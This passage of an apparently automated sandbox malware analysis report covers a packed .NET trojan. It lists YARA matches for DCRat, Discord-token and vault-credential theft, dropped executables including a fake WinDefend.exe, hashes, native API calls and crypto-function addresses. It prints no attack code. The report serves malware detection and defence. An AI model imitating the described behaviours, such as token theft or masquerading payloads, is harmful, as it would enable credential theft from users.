Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7280, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen

PE file contains section with special chars

Source: WinDefend.exe.0.dr

Static PE information: section name: %q2hF6

PE file has nameless sections

Source: WinDefend.exe.0.dr

Static PE information: section name:

Very long command line found

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F03D5E NtProtectVirtualMemory,	2_2_00007FF848F03D5E
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F131DE NtProtectVirtualMemory,	3_2_00007FF848F131DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F431DE NtProtectVirtualMemory,	18_2_00007FF848F431DE
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F13D6E NtProtectVirtualMemory,	19_2_00007FF848F13D6E
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F14048 NtProtectVirtualMemory,	19_2_00007FF848F14048
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F33DBE NtProtectVirtualMemory,	20_2_00007FF848F33DBE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F031DE NtProtectVirtualMemory,	21_2_00007FF848F031DE

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F03D5E	2_2_00007FF848F03D5E
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F00E5D	2_2_00007FF848F00E5D
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F00E70	2_2_00007FF848F00E70
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F131DE	3_2_00007FF848F131DE
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F12AED	3_2_00007FF848F12AED
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF32D0	4_2_02CF32D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF3B50	4_2_02CF3B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF0848	4_2_02CF0848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16E7	4_2_02CF16E7
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF5480	4_2_02CF5480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF8C78	4_2_02CF8C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF45C0	4_2_02CF45C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6288	4_2_02CF6288
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6298	4_2_02CF6298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6294	4_2_02CF6294
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF32A7	4_2_02CF32A7
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF78C0	4_2_02CF78C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF70A8	4_2_02CF70A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF70B4	4_2_02CF70B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF78B0	4_2_02CF78B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF0838	4_2_02CF0838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7648	4_2_02CF7648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7639	4_2_02CF7639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2748	4_2_02CF2748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2739	4_2_02CF2739
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF546F	4_2_02CF546F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF8C67	4_2_02CF8C67
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7418	4_2_02CF7418
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7428	4_2_02CF7428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7425	4_2_02CF7425
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6D9D	4_2_02CF6D9D
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6D90	4_2_02CF6D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6DA0	4_2_02CF6DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F50C18	4_2_04F50C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F517B8	4_2_04F517B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F50C0F	4_2_04F50C0F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F51274	4_2_04F51274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F5125F	4_2_04F5125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F517A8	4_2_04F517A8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F431DE	18_2_00007FF848F431DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F42AED	18_2_00007FF848F42AED
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F10E5D	19_2_00007FF848F10E5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F13D6E	19_2_00007FF848F13D6E
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F10E70	19_2_00007FF848F10E70
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A28	20_2_00007FF848F41A28
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41961	20_2_00007FF848F41961
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F3BCD2	20_2_00007FF848F3BCD2
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43B28	20_2_00007FF848F43B28
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F30E5D	20_2_00007FF848F30E5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F6A6B8	20_2_00007FF848F6A6B8
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43D88	20_2_00007FF848F43D88
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F33DBE	20_2_00007FF848F33DBE
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F3AF26	20_2_00007FF848F3AF26
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F6A730	20_2_00007FF848F6A730
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42F38	20_2_00007FF848F42F38
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42FD8	20_2_00007FF848F42FD8
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A30	20_2_00007FF848F41A30
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A89	20_2_00007FF848F41A89
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F30E70	20_2_00007FF848F30E70
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42D10	20_2_00007FF848F42D10
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF849120350	20_2_00007FF849120350
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F031DE	21_2_00007FF848F031DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10A7D	21_2_00007FF848F10A7D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F09296	21_2_00007FF848F09296
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F02AED	21_2_00007FF848F02AED
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0E99D	21_2_00007FF848F0E99D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F043CD	21_2_00007FF848F043CD
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0D38F	21_2_00007FF848F0D38F
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10BC5	21_2_00007FF848F10BC5
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10D98	21_2_00007FF848F10D98
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10DD0	21_2_00007FF848F10DD0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0A042	21_2_00007FF848F0A042
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F1005A	21_2_00007FF848F1005A
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0FFF0	21_2_00007FF848F0FFF0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490F221E	21_2_00007FF8490F221E
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D5990	21_2_00007FF8490D5990
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D0CCF	21_2_00007FF8490D0CCF
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EBCF4	21_2_00007FF8490EBCF4
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490F3386	21_2_00007FF8490F3386
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D3BDA	21_2_00007FF8490D3BDA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E6E80	21_2_00007FF8490E6E80
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E6EC0	21_2_00007FF8490E6EC0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490DAFFD	21_2_00007FF8490DAFFD
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EA890	21_2_00007FF8490EA890
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490FC8AE	21_2_00007FF8490FC8AE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4AD3	21_2_00007FF8490D4AD3
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D38FA	21_2_00007FF8490D38FA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E0119	21_2_00007FF8490E0119
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D51F2	21_2_00007FF8490D51F2
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EEB15	21_2_00007FF8490EEB15
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4B10	21_2_00007FF8490D4B10
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EF328	21_2_00007FF8490EF328
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EEBF6	21_2_00007FF8490EEBF6
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D5605	21_2_00007FF8490D5605
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4DF8	21_2_00007FF8490D4DF8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D46D3	21_2_00007FF8490D46D3
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D46C8	21_2_00007FF8490D46C8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E0D69	21_2_00007FF8490E0D69
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EDD90	21_2_00007FF8490EDD90
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EDD79	21_2_00007FF8490EDD79
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E5048	21_2_00007FF8490E5048
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490ED058	21_2_00007FF8490ED058
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4EFA	21_2_00007FF8490D4EFA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EAF4D	21_2_00007FF8490EAF4D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490DF7CD	21_2_00007FF8490DF7CD
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01520848	22_2_01520848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01523B50	22_2_01523B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015232D0	22_2_015232D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015245C0	22_2_015245C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01528C78	22_2_01528C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01525480	22_2_01525480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01521664	22_2_01521664
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01520838	22_2_01520838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015278C0	22_2_015278C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015278B0	22_2_015278B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015270A8	22_2_015270A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01525399	22_2_01525399
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01523261	22_2_01523261
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526298	22_2_01526298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526288	22_2_01526288
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526D90	22_2_01526D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526DA0	22_2_01526DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527418	22_2_01527418
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01528C20	22_2_01528C20
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527428	22_2_01527428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01522748	22_2_01522748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01522739	22_2_01522739
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527648	22_2_01527648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527639	22_2_01527639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_0544A388	22_2_0544A388
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_0544A398	22_2_0544A398
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_054483B4	22_2_054483B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD97B4	22_2_05DD97B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD9F48	22_2_05DD9F48
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDEEF0	22_2_05DDEEF0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD7E71	22_2_05DD7E71
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDE8F8	22_2_05DDE8F8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDD290	22_2_05DDD290
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD9D69	22_2_05DD9D69
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDF770	22_2_05DDF770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDEEE0	22_2_05DDEEE0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDE8E9	22_2_05DDE8E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDF348	22_2_05DDF348
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C17B8	22_2_062C17B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C0C18	22_2_062C0C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C1274	22_2_062C1274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C125F	22_2_062C125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C17A8	22_2_062C17A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C0C08	22_2_062C0C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD323D	25_2_00007FF848FD323D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD8D9E	25_2_00007FF848FD8D9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD531A	25_2_00007FF848FD531A
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01130848	31_2_01130848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01133B50	31_2_01133B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011332D0	31_2_011332D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011345C0	31_2_011345C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01138C78	31_2_01138C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01135480	31_2_01135480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0113161E	31_2_0113161E
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01130838	31_2_01130838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011378B0	31_2_011378B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011370A8	31_2_011370A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011378C0	31_2_011378C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01135399	31_2_01135399
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0113326F	31_2_0113326F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136298	31_2_01136298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136D90	31_2_01136D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136DA0	31_2_01136DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01138C20	31_2_01138C20
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137428	31_2_01137428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01132738	31_2_01132738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01132748	31_2_01132748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137639	31_2_01137639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137648	31_2_01137648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AD290	31_2_0B5AD290
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AE8F8	31_2_0B5AE8F8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A9F48	31_2_0B5A9F48
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AF770	31_2_0B5AF770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A97B4	31_2_0B5A97B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A7E71	31_2_0B5A7E71
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AEEF0	31_2_0B5AEEF0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AF348	31_2_0B5AF348
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AE8E9	31_2_0B5AE8E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A17E9	31_2_0B5A17E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AEEE0	31_2_0B5AEEE0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A9D69	31_2_0B5A9D69
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF17B8	31_2_0EDF17B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF0C18	31_2_0EDF0C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF125F	31_2_0EDF125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF1274	31_2_0EDF1274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF17A8	31_2_0EDF17A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF0C08	31_2_0EDF0C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FF848FE542A	47_2_00007FF848FE542A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FF848FE334D	47_2_00007FF848FE334D

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Infected.exe A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Loaader.exe A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282

One or more processes crash

Source: C:\Users\user\AppData\Roaming\Loader.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe" vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
